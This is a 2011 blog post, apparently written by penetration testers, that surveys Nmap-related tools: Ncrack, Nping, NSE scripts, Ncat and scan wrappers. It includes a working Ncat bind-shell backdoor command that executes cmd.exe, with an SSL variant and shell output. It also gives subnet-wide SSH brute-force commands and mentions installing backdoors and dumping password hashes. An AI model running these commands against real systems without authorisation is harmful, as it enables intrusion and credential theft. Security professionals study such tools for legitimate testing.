Apr 27, 2011

Advanced Nmap

Ncrack Ncrack is a command line password bruteforcer like hydra and medusa. Up until recently I was a stalwart Medusa user but what brought me over (mostly) was the superior SSH library, RDP password bruting, and easy nmap-like syntax. Should you want to audit a whole class C for ssh passwords Ncrack makes this easy:
ncrack scanme.nmap.org/24 -p 22
Ncrack supports the following protocols:
  • FTP
  • TElNET
  • SSH
  • RDP
  • HTTP(S)
  • SMB
  • POP3(s)
Comparing this to Medusa it seems like a lot less to offer, Medusa does SQL bruteforcers,  R-service bruteforcers, VNC, VMWare Authd, SNMP, etc, but in most cases I use Ncrack with Medusa as a backup. The rest of those protocols I can mostly get through Metasploit which is one less layer of abstraction. In some cases Ncrack can be less stable, in these cases rely on ole medusa to CYA. We recommended using password lists from SkullSecurity, Ron has made an extensive list of popular site breaches and their associated leaked passwords for pentesters to use with bruteforcing tools.


In general Hping’s utility is to generate custom packets. Using hping is way easier than implementing custom packets in a scripting language like python. A major drawback to Hping was its lack of inherent “scanner” type functionality, meaning that unless you created a bash wrapper or TCL script it was a one target type of tool. Nping fixes this in stellar fashion by supporting Nmap syntax. Although Nmap has done it’s best to implement the type of scanning one would do with Hping/Nping nothing beats having a command line tool to send custom packets. Custom packets being a very ambiguous term, Hping has traditionally been used to test firewalls, evade IDS, send POC/DoS packets, etc. Many have moved over to Scapy as it offers a bit more in the way of  customization but Nping is a welcome addition to packet crafting tools.

NSE (Nmap Scripting Engine)

The Nmap Scripting Engine is a lua framework to do pretty much anything within nmap, with the power of nmap. If you think about it, it was a natural progression. Some bigtime firms I know have taken vuln scanners out of the rotation in their pentests opting for specific targeted NSE scripts.  In addition NSE offers a lot to both netpen and webpen. A plethora of scripts are webpen based. There are a modest 194 scripts in SVN but I know that not everyone is releasing thier scripts, which imo hurts the projects awesomeness. Lame pentesters are lame. Here are some of our favs:
  • banner - A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds. We’ve used this to scan large domains with services not in the nmap fingerprints database and pipe the output to files for later inspection.
  • dns-cache-snoop - Performs DNS cache snooping against a DNS server. Replaces easy bash scripting, but nice.
  • hostmap - Tries to find hostnames that resolve to the target’s IP address by querying the online database at http://www.bfk.de/bfk_dnslogger.html. Replaces Hostmap which is intermittently broken =(
  • http-brute - Performs brute force password auditing against http basic authentication. Saves some time setting up Burp to do this.
  • http-enumEnumerates directories used by popular web applications and servers. WIN. We have ported many fingerprints we see often into http-enum’s fingerprint database (in fact we are credited in that source). Dirbuster and wfuzz are great and focus on  large sets of common words for directory bruteforcing, we use http-enum for more targeted framework bruteforcing… and it works.
  • smb-enum-shares - Attempts to list shares using the srvsvc.NetShareEnumAll MSRPC function and retrieve more information about them using srvsvc.NetShareGetInfo. If access to those functions is denied, a list of common share names are checked.
  • smb-brute - Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. SMB is the weakest link… goodbye.
  • smb-check-vulns - Checks for vulnerabilities: MS08-067, etc, etc.
  • smb-psexec - This script implements remote process execution similar to the Sysinternals’ psexec tool, allowing a user to run a series of programs on a remote machine and read the output. This is great for gathering information about servers, running the same tool on a range of system, or even installing a backdoor on a collection of computers.
  • As well as the more targeted SNMP, MSSQL,  MYSQL, ORACLE, and Lotus enumeration and bruteforce scripts.
As service level detection becomes available for this, well, you can imagine a lot of vuln scan companies running scared. A Sample run looks like so:
nmap -PN -sS -sV --script=vulscan -p25 www.target.com

25/tcp open  smtp    syn-ack Exim smtpd 4.69
| vulscan: [5330] Exim Configuration File Variable Overflow
| [5896] Exim sender_verify Function Remote Overflow
| [5897] Exim header_syntax Function Remote Overflow
| [5930] Exim Parenthesis File Name Filter Bypass
| [12726] Exim -be Command Line Option host_aton Function Local Overflow
| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
Also Nmap NSE and Metasploit have bridged a bit through new functions implemented in Metasploit, check that out. Ron also has an experimental pwdump like Nmap script that will dump password hashes and send them to you rainbow tables … effing eh…
So, NSE… get on it. Here are some links to get you hyped:
PS – I like to search for cool non-trunk scripts like this in google:  ”nse script nmap -nmap.org”  and to the left sort results by last 6 months (i do this for a lot of hacking tools actually)


Ncat is Nmap's answer to Netcat. It pretty much does everything netcat can do plus implements IPV6, UDP,  and SSL socket connections... no more stunnel! It also has hex output options, SOCKS4 + HTTP Proxying,  and built in access control. Irongeek has a video basically showing all the flag actions in practice, you can find that here. Ncat also comes with a nifty exec feature, here we are ssl wrapping our backdoor:

Backdoor ncat:
C:\Windows\System32> ncat -l --exec "cmd.exe" 1337
root@bt:~# ncat 1337
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

 Volume in drive C has no label.
 Volume Serial Number is 00E1-F423

 Directory of c:\Windows\System32

04/15/2011  03:20 AM              .
04/15/2011  03:20 AM              ..
07/13/2009  10:37 PM              0409
09/27/2010  10:33 AM              1033
Traffic Inspection of backdoor before SSL: SSL backdoor:
C:\Windows\System32> ncat -l --ssl --exec "cmd.exe" 1337
root@bt:~# ncat --ssl 1337
Traffic Inspection of "dir" command using backdoor after SSL:

Nmap UDP Payload Scanning

The issue facing accurate scanning of UDP ports is the nature of UDP programs themselves. Delivering anything other than a legitimate UDP Payload to a service usually results in a dropped packet. This is bad news for pentesters, as we want a full and accurate scan of our targets. UDP Payload scanning is the solution (most of the time). Instead of scanning with an empty UDP packet, we send it a legitimate payload that works with the service we are scanning. If we receive a response it indicates an open port. Before Nmap 5.21, Nmap did not support UDP payload scanning. Pentesters previously counted on free tools like UnicornScan, whose author Jack C. Louis passed away last year (rest in peace Jack), or udp-proto-scanner by Portcullis Labs. Although these tools are often stellar, sometimes they are buggy and lack the Nmap type features we want in a port scanner.
Newer versions of Nmap fix that dilemma by adding the following UDP fingerprints for scanning:
udp/7 echo
udp/53 domain
udp/111 rpcbind
udp/123 ntp
udp/137 netbios-ns
udp/161 SNMP
udp/177 xdmcp
udp/500 ISAKMP
udp/520 route
udp/1645 RADIUS
udp/1812 RADIUS
udp/2049 NFS
udp/5353 zeroconf
udp/10080 amanda

Auxiliary Nmap Scripts

There are several scripts for manipulating output and extending Nmap.
    fastNmap and npwn – Perl scripts for maximizing scanning large networks by cutting up your scans into small tasks and analyzing large scan data in better fashion. I’m excited to use this on a cloud provider soon for some fast and furious /16 script scanning. Research project presentations (pdf’s) here and here fastnmap and npwn code hereSmap – Recently an interesting one I have played with is smap a nmap wrapper that will take namp output and run hosts through Niagos service checks as well. The author claims the checks are more accurate than Nmap. Either way, I tested the wrapper against some local lab machines and it identified more HTTP servers and and versions for non-standard ports than map did, and more accurately. Smap discussion here and download here. Sample output:
    root@bt:~/smap/scan_data/2011-04-26_16.15.29# cat report-hosts.log
    Scan_results generated for 2011-04-26_16.15.29
    --[ HOST - List ]--------
    IP                        :: Port   :: Service              -> Server_Type
    --------------------------::--------::----------------------->-----------------------------------------------------------               :: 10243  :: http                 -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP). Ignored State: closed (12325)               :: 8834   :: http                 -> NessusWWW               :: 5357   :: http                 -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP).               :: 3389   :: microsoft-rdp        -> Microsoft Terminal Service.               :: 3306   :: mysql                -> MySQL (unauthorized).               :: 2869   :: icslap?              -> .               :: 1241   :: ssl.nessus           -> Nessus Daemon (NTP v1.2).               :: 1036   :: nsstp?               -> .               :: 1035   :: multidropper?        -> .               :: 1027   :: msrpc                -> Microsoft Windows RPC.               :: 1026   :: LSA-or-nterm?        -> .               :: 1025   :: msrpc                -> Microsoft Windows RPC.               :: 990    :: ftps?                -> .               :: 912    :: vmware-auth          -> VMware Authentication Daemon 1.0 (Uses VNC               :: 554    :: rtsp?                -> .               :: 445    :: netbios-ssn          -> .               :: 443    :: ssl.http             -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.
    v5.10.1).               :: 139    :: netbios-ssn          -> .               :: 135    :: msrpc                -> Microsoft Windows RPC.               :: 80     :: http                 -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.
    Rainmap – Rainmap was a Summer of Code project to distribute nmap scanning among cloud servers and consolidate command and control through a single web gui. The project was completed but is slated for a rewrite this SoC. For me, it looks like it has too many moving parts and needs some more development but it is out there. Nmap to SQL – Nmap lacks sql output for some reason. A buddy of min asked fyodor why its not there by default and fyodor told him to go read the Nmap book. he instead wrote his own, with more output than most of the comparative ones out there. Here. Nsploit – a XMLRPC bridge from nmap to metasploit (yes we know armitage is cool, we prefer non GUI apps). Learn more here Here.
    Droidmap – nmap for droid, still in dev. Here

No comments: